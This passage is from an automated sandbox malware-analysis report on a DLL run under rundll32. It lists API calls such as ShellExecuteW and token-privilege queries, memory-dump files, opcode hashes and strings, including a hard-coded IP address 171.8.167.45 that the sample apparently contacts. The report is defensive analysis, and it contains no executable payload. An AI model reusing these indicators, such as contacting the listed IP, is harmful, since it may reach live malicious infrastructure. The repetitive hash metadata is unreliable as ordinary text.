                                                                  • ShellExecuteW.SHELL32 ref: 000000018004B0BF
                                                                    • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                    • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                    • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                    • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                    • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                    • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                    • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                  • memset.MSVCRT ref: 000000018004B0DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                  • String ID: p
                                                                  • API String ID: 526592482-2181537457
                                                                  • Opcode ID: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                  • Instruction ID: 630a19f9e7c8d33164371876bc9408f173fd4fcd3dffaf0243fab21a92527801
                                                                  • Opcode Fuzzy Hash: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                  • Instruction Fuzzy Hash: E1217432204F8885E7A1DF61F48078AB7A4F788BC4F558121FE8883B5ADF38C654CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                  • API String ID: 3702945584-3718352646
                                                                  • Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                  • Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
                                                                  • Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                  • Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentSleepThread
                                                                  • String ID: 171.8.167.45
                                                                  • API String ID: 1164918020-2723241389
                                                                  • Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                  • Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
                                                                  • Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                  • Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                  • API String ID: 3702945584-3718352646
                                                                  • Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                  • Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
                                                                  • Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                  • Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID:
                                                                  • API String ID: 432778473-0
                                                                  • Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                  • Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
                                                                  • Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                  • Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%